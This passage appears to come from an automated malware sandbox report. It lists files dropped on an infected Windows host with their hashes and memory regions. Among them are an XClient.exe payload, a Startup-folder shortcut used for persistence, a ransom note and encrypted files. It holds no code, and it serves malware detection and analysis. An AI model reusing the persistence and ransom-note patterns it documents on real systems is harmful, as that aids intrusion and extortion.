                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\personality-provider\nb_model_build_attachment_reference.json
                                                        Filesize

                                                        56KB

                                                        MD5

                                                        567eaa19be0963b28b000826e8dd6c77

                                                        SHA1

                                                        7e4524c36113bbbafee34e38367b919964649583

                                                        SHA256

                                                        3619daa64036d1f0197cdadf7660e390d4b6e8c1b328ed3b59f828a205a6ea49

                                                        SHA512

                                                        6766919b06ca209eaed86f99bee20c6dad9cc36520fc84e1c251a668bcfe0afcf720ea6c658268dc3bbaaf602bfdf61eb237c68e08d5252ea6e5d1d2a373b9fe

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\personality-provider\nb_model_build_attachment_science.json
                                                        Filesize

                                                        56KB

                                                        MD5

                                                        7a8fd079bb1aeb4710a285ec909c62b9

                                                        SHA1

                                                        8429335e5866c7c21d752a11f57f76399e5634b6

                                                        SHA256

                                                        9606ce3988b2d2a4921b58ac454f54e53a9ea8f358326522a8b1dcc751b50b32

                                                        SHA512

                                                        8fc1546e509b5386c9e1088e0e3a1b81f288ef67f1989f3e83888057e23769907a2b184d624a4e4c44fcd5b88d719bd4cca94dfb33798804a721b8be022ec0c6

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\personality-provider\nb_model_build_attachment_shopping.json
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        97d4a0fd003e123df601b5fd205e97f8

                                                        SHA1

                                                        a802a515d04442b6bde60614e3d515d2983d4c00

                                                        SHA256

                                                        bfd7e68ddca6696c798412402965a0384df0c8c209931bbadabf88ccb45e3bb6

                                                        SHA512

                                                        111e8a96bc8e07be2d1480a820fc30797d861a48d80622425af00b009512aacb30a2df9052c53bfbf4ee0800b6e6f5b56daa93d33f30fecb52e2f3850dfa9130

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\personality-provider\nb_model_build_attachment_sports.json
                                                        Filesize

                                                        56KB

                                                        MD5

                                                        ce4e75385300f9c03fdd52420e0f822f

                                                        SHA1

                                                        85c34648c253e4c88161d09dd1e25439b763628c

                                                        SHA256

                                                        44da98b03350e91e852fe59f0fc05d752fc867a5049ab0363da8bb7b7078ad14

                                                        SHA512

                                                        d119dc4706bbf3b6369fe72553cfacf1c9b2688e0188a7524b56d3e2ac85582a18bbee66d5594e0fb40767432646c23bf3e282090bd9b4c29f989a374aeae61f

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\personality-provider\nb_model_build_attachment_travel.json
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        48139e5ba1c595568f59fe880d6e4e83

                                                        SHA1

                                                        5e9ea36b9bb109b1ecfc41356cd5c8c9398d4a78

                                                        SHA256

                                                        4336ac211a822b0a5c3ce5de0d4730665acc351ee1965ea8da1c72477e216dfa

                                                        SHA512

                                                        57e826f0e1d9b12d11b05d47e2f5ae4f5787537862f26e039918cb14faff4bc854298c0b7de3023e371756a331c0f3ee1aa7cebbbf94ec70cdfc29e00a900ed1

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\personality-provider\recipe_attachment.json
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        be3d0f91b7957bbbf8a20859fd32d417

                                                        SHA1

                                                        fbc0380fe1928d6d0c8ab8b0a793a2bba0722d10

                                                        SHA256

                                                        fc07d42847eeaf69dcbf1b9a16eb48b141c11feb67aa40724be2aee83cb621b7

                                                        SHA512

                                                        8da24afcf587fbd4f945201702168e7cfc12434440200d00f09ddcd1d1d358a5e01065ac2a411fdf96a530e94db3697e3530578b392873cf874476b5e65d774a

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\prefs-1.js
                                                        Filesize

                                                        6KB

                                                        MD5

                                                        d5dfefd1269598928d313e5191d8021a

                                                        SHA1

                                                        91f1487a5cca4ee20ba382c044e216af5aee30b6

                                                        SHA256

                                                        497859f3935a63f56c7697b5a51078224186caaf4e13d4106a9baf96afece9ea

                                                        SHA512

                                                        0076f85ed54b52a6d968060c3ec2ea282d8672833ad62cc5c341ec815617edb637660ea0c3aa8802972030abf3a4e332a40caf27a4f9919cbf1627d53ee6f07e

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\prefs-1.js
                                                        Filesize

                                                        7KB

                                                        MD5

                                                        01aba37327cc8e3b916efc72cc2e949d

                                                        SHA1

                                                        53f8e47312df0cec80f2be38d7342f936f804e85

                                                        SHA256

                                                        395b7b768a4511664778fdcb613e859b31b34bdd510b45d4040baa3671a718c7

                                                        SHA512

                                                        452d470d4a012ae95708f25636ed3fa6be5869fd8816906ac771dc6ea3e6fdbd506c8e0b7edfcd602b3c24679c3eaf7f58ec4c8ed33c78f61b0e4f6988c6852f

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\prefs-1.js
                                                        Filesize

                                                        9KB

                                                        MD5

                                                        b3fe59e24ca3b3fa9cccf93a27cebe44

                                                        SHA1

                                                        976c91928453f8a37c835d4080851f4454397d84

                                                        SHA256

                                                        71bb43f7ebf0a7a2119a5441dd7d76c6b9fd7e6215e5150f35081ded7e7f4d72

                                                        SHA512

                                                        ab69aef58676d2057358eba313c1fa5b8e7d10830583535d575b9c71e7b7444afe72fc3e10abdc6dd162b76b0ead5292edc0c6c57f92dc5e581b1ac104fd8ce4

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\prefs-1.js
                                                        Filesize

                                                        9KB

                                                        MD5

                                                        8d1e265c64a7ae8e0ff8353cae837a68

                                                        SHA1

                                                        5a0c5c56d8bce226899a48ebacd1242ed0da446a

                                                        SHA256

                                                        9cd0ebc999da6796049670910c4bb715d014232b880cfeebcf898430add062b4

                                                        SHA512

                                                        d9ff4426cea4409742991ad1e28408f546bd94f7ceda62eebd7c2cbe5bc8523ada5acc36c065efd433867723a9d3109e84b39cb9303af410971da138af6018f8

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\prefs-1.js
                                                        Filesize

                                                        10KB

                                                        MD5

                                                        27556bdf102ed5a4a9826a6740231867

                                                        SHA1

                                                        34e78efa6cba59039c6f0755103ed47ba80a7860

                                                        SHA256

                                                        c6f9dec10fb061f184bc9c1dea372ca8359c40cbb9fb19687b54ebfb5f6f6c6a

                                                        SHA512

                                                        8f44bb5c3dfad49d197fbdd0e33c824f4b5173bb0d53127ca0136c5990c2591488ccc9b9d926a5b20c1274f7c8c6a84006f7b7cea7ce72777d042c00d3395038

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\prefs-1.js
                                                        Filesize

                                                        10KB

                                                        MD5

                                                        847d5d0ed6d3ada4d9ebb29755cd9aac

                                                        SHA1

                                                        42c36af6afa2b5885adaec191d7913c8c69fa7f1

                                                        SHA256

                                                        4ac59944ba59036d994d1195b7ff93299e1b81244fa4ea892d432fc58833122c

                                                        SHA512

                                                        443fa70b9ce3eed2fbd8e1cf668683c7b8cf4ea575d53a7203fa63665e818b71510055d1aedd0ed1fe088aaccda697608814d0d715eee4fc9e1519fea51610c9

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\prefs.js
                                                        Filesize

                                                        517B

                                                        MD5

                                                        904a664eea39b0b7b868aa5f3a3eadd2

                                                        SHA1

                                                        4d2e976aece267bf111b4e98d2bedaa8c7e0e4b8

                                                        SHA256

                                                        309a2fbdabfdfdefe2f5b8dc92196cae52bd4688d4dfe69f38f4d65eb266cd81

                                                        SHA512

                                                        1b3d2dce681cceb655d660fac7b777cab9e3cda8a42659a91c09e67627650d2e68cefdcc7cd7f3e2153d605c459f55649bbcd8648f241833c919ac3aac15ca28

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\search.json.mozlz4
                                                        Filesize

                                                        280B

                                                        MD5

                                                        41d220d4783f67d2b57beec20c135229

                                                        SHA1

                                                        6e97765e77920b6010fac2cb4abf1e3cea106541

                                                        SHA256

                                                        5d1881e74d76b95bad59439bb5c7676258a4ae6b6d853074e93b5247cf1715dc

                                                        SHA512

                                                        dc30ddc4c8cfe598de5e24bc88cebbe4256fbb21a0b1db6c2ec15311053e7d8be6a93a0bcfcfd8a02543f8b9cf9b15a5840154b272a2df71d59d7dfd80984ac0

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\search.json.mozlz4.tmp
                                                        Filesize

                                                        296B

                                                        MD5

                                                        c028a128653c1f74de43185d94329fbe

                                                        SHA1

                                                        186a208a28296c33525006a3561840ec7e5a241c

                                                        SHA256

                                                        d9e0eda6f32e7161a8f5e881f10f402b0b32c057c4fbc457cbd117bebd0b3b75

                                                        SHA512

                                                        3855bc112b7b5c94c8e3cb67a3d2a74ba97a2e1ed37ed05db68f4f68091ba4e40088181b3ab791e0dd9cf776509bfc2d545dea751e6bf98c8765f96766886de2

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\sessionCheckpoints.json
                                                        Filesize

                                                        53B

                                                        MD5

                                                        ea8b62857dfdbd3d0be7d7e4a954ec9a

                                                        SHA1

                                                        b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

                                                        SHA256

                                                        792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

                                                        SHA512

                                                        076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\sessionstore-backups\recovery.jsonlz4
                                                        Filesize

                                                        802B

                                                        MD5

                                                        982a15b6fd55d8666d047a598578a735

                                                        SHA1

                                                        06b587b566c21af3919a1d2dc94caf405b26c19c

                                                        SHA256

                                                        ee4f8e05d78e372b577a7bec34d3b69688d4e7ebfe2a0f14514fb51a142e603e

                                                        SHA512

                                                        16eea50116a8b7128bae08e6197f7b36bdb85d4713b5cebefd99b581dc3c64aa2f2b19a322f3675c09f02452aca91c2cfa4e62ce147e5798645d3244eb632ea0

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
                                                        Filesize

                                                        7KB

                                                        MD5

                                                        c460716b62456449360b23cf5663f275

                                                        SHA1

                                                        06573a83d88286153066bae7062cc9300e567d92

                                                        SHA256

                                                        0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0

                                                        SHA512

                                                        476bc3a333aace4c75d9a971ef202d5889561e10d237792ca89f8d379280262ce98cf3d4728460696f8d7ff429a508237764bf4a9ccb59fd615aee07bdcadf30

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\shield-preference-experiments.json
                                                        Filesize

                                                        18B

                                                        MD5

                                                        285cdefb3f582c224291f7a2530f3c4e

                                                        SHA1

                                                        f816c3e87aa007b6e6d31eb6a4618695a7d83439

                                                        SHA256

                                                        704d28223a4320a853df4a19d48c7015cf79d56a5317cc3475b6305fa43dcc05

                                                        SHA512

                                                        8f1decf1e4b5755fce8f165daae115f45d6890985c9c4bbb33a6f724cbfd26db75f6da06f9ef675de20fe755da9b7f55e5ee37124296a12a520a393da159bd58

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                                        Filesize

                                                        48KB

                                                        MD5

                                                        b4fb428229fb613bdc3096a49637dba1

                                                        SHA1

                                                        097be79ef597eac5aef0a3d6a07ccc9206c7b79a

                                                        SHA256

                                                        6d615532a693b81068883e65e4521abb9227af72c96a5b28a8d9573448b4b1d6

                                                        SHA512

                                                        de5fc9dc38645d411bdbca6132caf8449bece16a10b8c0c19f1a82802b8db7e82b6624aad0fa853cf84e3f8b3b165f6ea459799ff49390defa346b746c7b7229

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                                                        Filesize

                                                        1.1MB

                                                        MD5

                                                        890b991eb4a172d4a49877ae93bfe47e

                                                        SHA1

                                                        6fbb64b0234f27f4b9157cfb598aa2042cf0cc03

                                                        SHA256

                                                        81391049efc00639d65ea1025e998c55ee5c84c3ef0b21a9d06ed9aea87ee1c1

                                                        SHA512

                                                        f1e4104d3dd28f3260299ef995c3fbbc736c68c5e87dd450921fe318a51099eaf6e4379c23de12530a70bd56adfa9c9c17b875bb08083a1c588d5d21da42eb3a

                                                      • C:\Users\Admin\AppData\Local\Mozilla\Firefox\FireFox Data\targeting.snapshot.json
                                                        Filesize

                                                        4KB

                                                        MD5

                                                        4af3e2127656aaf3f2eb09fe1c5be203

                                                        SHA1

                                                        0f9458e7ab1ef60c306b8d5712171fb67b1ebffe

                                                        SHA256

                                                        be530ef0041f42292562f8bd513b41c75128f71478440081da02013f50ead34c

                                                        SHA512

                                                        1049867e044a836a42e161fb2209e2728de4fbf89cca71c7199ae9925028502fa18d9e6a323909efed3ed7b35378542a22745600646a64d312283c6115847a32

                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4i4hxhp.xec.ps1
                                                        Filesize

                                                        60B

                                                        MD5

                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                        SHA1

                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                        SHA256

                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                        SHA512

                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon
                                                        Filesize

                                                        442KB

                                                        MD5

                                                        85430baed3398695717b0263807cf97c

                                                        SHA1

                                                        fffbee923cea216f50fce5d54219a188a5100f41

                                                        SHA256

                                                        a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                                                        SHA512

                                                        06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                                                      • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1
                                                        Filesize

                                                        8.0MB

                                                        MD5

                                                        a01c5ecd6108350ae23d2cddf0e77c17

                                                        SHA1

                                                        c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                                                        SHA256

                                                        345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                                                        SHA512

                                                        b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                        Filesize

                                                        261B

                                                        MD5

                                                        4a198717e151e1f6fc13fa8ce7c336b5

                                                        SHA1

                                                        a2aa5b03fc0f4a1bb1df7629430128d83edc65cd

                                                        SHA256

                                                        a45944f5cf39be42ed8c5fb2842445a83d11aa5407cf782cdc00c951977386d7

                                                        SHA512

                                                        65d4ce555add9d9c0f32044acb599b4eb29265602ecca19c06c634ec0ef2b4556765f4594919ec2ae89f86e5786311c58ea4dda53f759b7879dcb30920f5d87d

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
                                                        Filesize

                                                        663B

                                                        MD5

                                                        ced0bd5f47638b1ce3bc04f0ab7a2246

                                                        SHA1

                                                        6d0f5d82a6eaa6233c8cc59c9d3c508f693e6874

                                                        SHA256

                                                        0ddbbfe9ea5b736d4ffb5c5b81c9ebd9d017afc670e2cdc4895297d0a701dc54

                                                        SHA512

                                                        f8f4e73d9d7ef7e0b99ec1e3d9c85fc112f8b638a27976e741db92654676d4ff2d93e75041c38ca49a8575b8066d691b5aae6b950449bb61df757e278a47faeb

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
                                                        Filesize

                                                        24B

                                                        MD5

                                                        4fcb2a3ee025e4a10d21e1b154873fe2

                                                        SHA1

                                                        57658e2fa594b7d0b99d02e041d0f3418e58856b

                                                        SHA256

                                                        90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

                                                        SHA512

                                                        4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
                                                        Filesize

                                                        3KB

                                                        MD5

                                                        42b0fbbef736b3fabc7edb33525285bf

                                                        SHA1

                                                        5d03ad3642f4d08020189b71cb01f37c15d3f08c

                                                        SHA256

                                                        e5af0a4e25ea19cbd3990816a1870ac4bd4a70e8746c65232d33ad979daf094b

                                                        SHA512

                                                        8e100f1a277744395c28c73becf1765757962aab9e114fdbb2ddf7946ded257af7b734e44e532587b3311e6869b1f4935061bf44c897248f5a22e8d0f7b92dd1

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                                                        Filesize

                                                        771B

                                                        MD5

                                                        62127167aa69c6ea2f126297e580434f

                                                        SHA1

                                                        a4201052a851b92b59105aae8d05140d05859d84

                                                        SHA256

                                                        72d259eb2c71fdcdaea4a1040f8664513ba55663c76a2c5d26cdc46b7b74075b

                                                        SHA512

                                                        19b8ae8220084831d628f3bf265c8e6d8ae9bf650545a83989bc71612c1ea9606aeeda6dad2544468ccea70e8e5fa2d72a65044043e4dc7564669a94e9721bd0

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\AppData\Roaming\XClient.exe
                                                        Filesize

                                                        67KB

                                                        MD5

                                                        404dee8c8fe0b8c25ac39f60960dcbf0

                                                        SHA1

                                                        078b5427a3c29a2f410f0e09f667389ad630ed60

                                                        SHA256

                                                        90d2777179534bb5746559397a767aeee141f30a57b53c5d9c2122278b4bc4b7

                                                        SHA512

                                                        9d7c6c2cceff330acea030002c4c7fde0a9ebe4f6a94a035e6fd6f08d7f5fea407680e5acd5baef687a19f40e116c47e8615dd4f728bdac7636529665e83956e

                                                      • C:\Users\Admin\Desktop\How To Decrypt My Files.html
                                                        Filesize

                                                        723B

                                                        MD5

                                                        553cf6c7e10d1c701098d7e1d0a01839

                                                        SHA1

                                                        3cbdf41c6d02de51754a2696a382485be5175771

                                                        SHA256

                                                        bfbb59fa451071b37088b6286c3e5941f2536c4d9a1b77c1c6e987da9545b6ae

                                                        SHA512

                                                        591ace58027c743e663598f29857e3fa52e47e5a015dfb5e46570fcc563b623306b6e9de5df0aed2f5242c7ae88178aced6c909ec3b8c075b5d7239922d3183c

                                                      • C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
                                                        Filesize

                                                        16B

                                                        MD5

                                                        e10061c6a520ef194130955e29beb404

                                                        SHA1

                                                        9ffa4942061ebeeb3c4d9fb9fe1ca96cd9b9a7ff

                                                        SHA256

                                                        dcb9eaadcd30c8cbab92344a092a1aa69c5468b7a94202d6e555d22e17989ff3

                                                        SHA512

                                                        50a23cde0d3d084988658c7d056461b5e818a2dcad9b8e38ed2596a10cfeb8dd347c7b5bc137880599720bf13e321ee1cda1f22256b10e212c6fd714c750a8dc

                                                      • C:\Users\Public\Desktop\license.txt
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        a1924707b191714b7044c99ed4e6b57e

                                                        SHA1

                                                        d53f801ce1350c386550634f1feaa94d03136a2c

                                                        SHA256

                                                        936f48b3d07861604842208428d200c5b1190186b892354ac073886efd88c61e

                                                        SHA512

                                                        ef8e16b3acdc9aa091ae1a127463dd5e291724e74fab38e20db8e0196e577cc6b87f796bc51c91da6ddc0134dc2c2819f93a4d53a1a3c0ccf74401c84dfc161d

                                                      • \??\pipe\LOCAL\crashpad_6480_KVTHYXEYSSOSYRZW
                                                        MD5

                                                        d41d8cd98f00b204e9800998ecf8427e

                                                        SHA1

                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                        SHA256

                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                        SHA512

                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                      • memory/1736-459-0x00007FF908D70000-0x00007FF908D80000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1736-460-0x00007FF908D70000-0x00007FF908D80000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1736-461-0x00007FF908D70000-0x00007FF908D80000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1736-462-0x00007FF908D70000-0x00007FF908D80000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1736-467-0x00007FF908D70000-0x00007FF908D80000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1736-526-0x00007FF906C60000-0x00007FF906C70000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/1736-535-0x00007FF906C60000-0x00007FF906C70000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/3960-190-0x0000000006480000-0x000000000649E000-memory.dmp
                                                        Filesize

                                                        120KB

                                                      • memory/3960-187-0x0000000004F80000-0x0000000004F90000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/3960-186-0x0000000004F80000-0x0000000004F90000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/3960-175-0x0000000005450000-0x0000000005472000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/3960-174-0x00000000055C0000-0x0000000005BE8000-memory.dmp
                                                        Filesize

                                                        6.2MB

                                                      • memory/3960-176-0x00000000054F0000-0x0000000005556000-memory.dmp
                                                        Filesize

                                                        408KB

                                                      • memory/3960-173-0x0000000004E30000-0x0000000004E66000-memory.dmp
                                                        Filesize

                                                        216KB

                                                      • memory/4400-172-0x00000000054A0000-0x0000000005506000-memory.dmp
                                                        Filesize

                                                        408KB

                                                      • memory/4400-167-0x0000000000400000-0x0000000000410000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4400-168-0x0000000005130000-0x00000000051C2000-memory.dmp
                                                        Filesize

                                                        584KB

                                                      • memory/4400-194-0x00000000029F0000-0x0000000002A00000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4400-170-0x0000000005820000-0x0000000005DC4000-memory.dmp
                                                        Filesize

                                                        5.6MB

                                                      • memory/4400-169-0x00000000051D0000-0x000000000526C000-memory.dmp
                                                        Filesize

                                                        624KB

                                                      • memory/4400-171-0x00000000029F0000-0x0000000002A00000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4440-143-0x000000001BCD0000-0x000000001BCE0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4440-134-0x000000001BCD0000-0x000000001BCE0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4440-160-0x000000001E0F0000-0x000000001E618000-memory.dmp
                                                        Filesize

                                                        5.2MB

                                                      • memory/4440-133-0x0000000000270000-0x0000000000288000-memory.dmp
                                                        Filesize

                                                        96KB

                                                      • memory/4440-9149-0x000000001BCD0000-0x000000001BCE0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4440-9048-0x000000001BCD0000-0x000000001BCE0000-memory.dmp
                                                        Filesize

                                                        64KB

                                                      • memory/4440-9047-0x000000001BC90000-0x000000001BCB2000-memory.dmp
                                                        Filesize

                                                        136KB

                                                      • memory/4932-146-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/4932-144-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/4932-155-0x00000135622E0000-0x00000135622E1000-memory.dmp
                                                        Filesize

                                                        4KB

                                                      • memory/4932-156-0x00000135622E0000-0x00000135622E1000-memory.dmp
